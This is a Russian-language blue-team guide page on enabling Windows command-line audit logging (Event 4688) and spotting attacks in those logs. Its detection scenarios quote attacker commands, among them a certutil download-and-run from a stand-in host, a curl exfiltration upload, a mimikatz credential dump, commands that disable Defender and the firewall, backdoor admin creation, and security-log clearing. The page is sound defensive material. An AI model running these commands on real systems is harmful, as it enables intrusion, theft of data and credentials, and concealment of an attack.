> For the complete documentation index, see [llms.txt](https://vasilisa-l.gitbook.io/blue-team-cookbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://vasilisa-l.gitbook.io/blue-team-cookbook/windows/audit/cmdline-logging.md).
# Логирование командной строки
### Включение логирования командной строки в события создания процессов
Логирование командной строки в событиях создания процессов — это важная функция для мониторинга безопасности, которая позволяет отслеживать, какие команды были выполнены при запуске процессов.
1. Откройте **Редактор групповых политик**
2. Перейдите в раздел:
* **Конфигурация компьютера** → **Административные шаблоны** → **Система** → **Аудит процессов**.
3. Включите политику **"Включить аудит командной строки"**
После включения этой политики в событиях создания процессов (Event ID 4688) будет добавлена информация о командной строке, которая использовалась для запуска процесса. Это позволяет отслеживать, какие команды выполняются на системе, что помогает обнаруживать подозрительную активность.
Обычно правила обнаружения, основанные на паттернах командной строки, не самые надежные и легко обходятся. Но это полезно, когда атакующие применяют системные утилиты для проведения атак.
## Некоторые сценарии обнаружения по артефактам командной строки
#### 1. **Загрузка вредоносного ПО с помощью LolBas**
* **Описание**: Злоумышленники могут использовать командную строку для загрузки и запуска вредоносных файлов.
* **Примеры команд**:
```cmd
certutil -urlcache -split -f http://malicious.site/malware.exe C:\Windows\Temp\malware.exe
C:\Windows\Temp\malware.exe
```
* **Как обнаружить**: Логирование покажет команды загрузки файлов с помощью утилит, таких как `certutil`, `bitsadmin` или `curl`.
{% hint style="info" %}
Ну в целом, в целом...\
Только для LOLBas обнаружение по паттернам командной строки является надежным способом обнаружения. \
Для всего остального можно использовать такой подход, но лучше иметь более надежные способы.
Про подход к написанию детектирующей логики: [Разработка правил обнаружения атак](/blue-team-cookbook/detection-engineering/detection-engineering.md)
{% endhint %}
Подборка всех видов LOLbins:
***
#### 2. **Обход защиты (Bypass)**
* **Описание**: Злоумышленники могут использовать командную строку для отключения антивируса, брандмауэра или других средств защиты.
* **Примеры команд**:
```cmd
netsh advfirewall set allprofiles state off
sc config WinDefend start= disabled
```
* **Как обнаружить**: Логирование покажет команды, связанные с отключением защиты, такие как `netsh`, `sc config`, или `reg add`.
***
#### 3. Горизонтальное **перемещение (Lateral Movement)**
* **Описание**: Злоумышленники могут использовать командную строку для перемещения по сети, используя утилиты, такие как `psexec`, `wmic` или `schtasks`.
* **Примеры команд**:
```cmd
psexec \\target-pc -u admin -p password C:\Windows\Temp\malware.exe
wmic /node:target-pc process call create "C:\Windows\Temp\malware.exe"
```
* **Как обнаружить**: Логирование покажет команды, связанные с удаленным выполнением кода или перемещением по сети.
***
#### 4. **Кража данных (Data Exfiltration)**
* **Описание**: Злоумышленники могут использовать командную строку для копирования или отправки данных на внешние серверы.
* **Примеры команд**:
```cmd
robocopy C:\Documents\Confidential\ \\attacker-server\share
curl -F "file=@C:\Documents\Confidential\file.txt" http://malicious.site/upload
```
* **Как обнаружить**: Логирование покажет команды, связанные с копированием или отправкой данных, такие как `robocopy`, `curl` или `ftp`.
***
#### 5. **Использование известных утилит для взлома**
* **Описание**: Злоумышленники могут использовать известные утилиты, такие как `mimikatz`, для кражи учетных данных или повышения привилегий.
* **Примеры команд**:
```cmd
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
```
* **Как обнаружить**: Логирование покажет запуск подозрительных утилит, таких как `mimikatz`, `procdump` или `pwdump`.
***
#### 6. **Создание backdoor-ов**
* **Описание**: Злоумышленники могут использовать командную строку для создания backdoor-ов, таких как добавление новых пользователей или настройка удаленного доступа.
* **Примеры команд**:
```cmd
net user hacker Password123 /add
net localgroup administrators hacker /add
```
* **Как обнаружить**: Логирование покажет команды, связанные с созданием пользователей или изменением групп.
***
#### 7. **Атаки на Active Directory**
* **Описание**: Злоумышленники могут использовать командную строку для атак на Active Directory. Или для разведки.
* **Примеры команд**:
```cmd
dsquery user -name admin
net user /domain
```
* **Как обнаружить**: Логирование покажет команды, связанные с Active Directory, такие как `dsquery`, `net user /domain` и другие.
***
#### 8. **Скрытие следов (Anti-Forensics)**
* **Описание**: Злоумышленники могут использовать командную строку для удаления логов или скрытия своей активности.
* **Примеры команд**:
```cmd
wevtutil cl Security
del C:\Windows\Temp\malware.exe
```
* **Как обнаружить**: Логирование покажет команды, связанные с удалением логов или файлов, такие как `wevtutil`, `del` или `rm`.
***
#### 9. **Атаки на реестр**
* **Описание**: Злоумышленники могут использовать командную строку для изменения реестра, например, для добавления автозагрузки.
* **Примеры команд**:
```cmd
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Malware /t REG_SZ /d "C:\Windows\Temp\malware.exe"
```
* **Как обнаружить**: Логирование покажет команды, связанные с изменением реестра, такие как `reg add` или `reg delete`.
[Реестр Windows: ключ к системе](/blue-team-cookbook/windows/registry.md)
***
#### 10. **Атаки на сетевые ресурсы**
* **Описание**: Злоумышленники могут использовать командную строку для сканирования сети или атак на сетевые ресурсы.
* **Примеры команд**:
```cmd
ping 192.168.1.1
net view \\target-pc
```
* **Как обнаружить**: Логирование покажет команды, связанные с сетевыми утилитами, такими как `ping`, `net view` или `nmap`.
***
{% hint style="info" %}
Несмотря на то, что такие правила обнаружения легко обойти, они всегда приминимы для обнаружения LolBas.
{% endhint %}
Для многих из описанных случаев, регистрируются и другие события, например Event ID 4720 (создание пользователя) или Sysmon 13 (изменение параметра реестра). \
Используйте гибридный подход для обнаружения любых аномалий в вашей сети.
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://vasilisa-l.gitbook.io/blue-team-cookbook/windows/audit/cmdline-logging.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.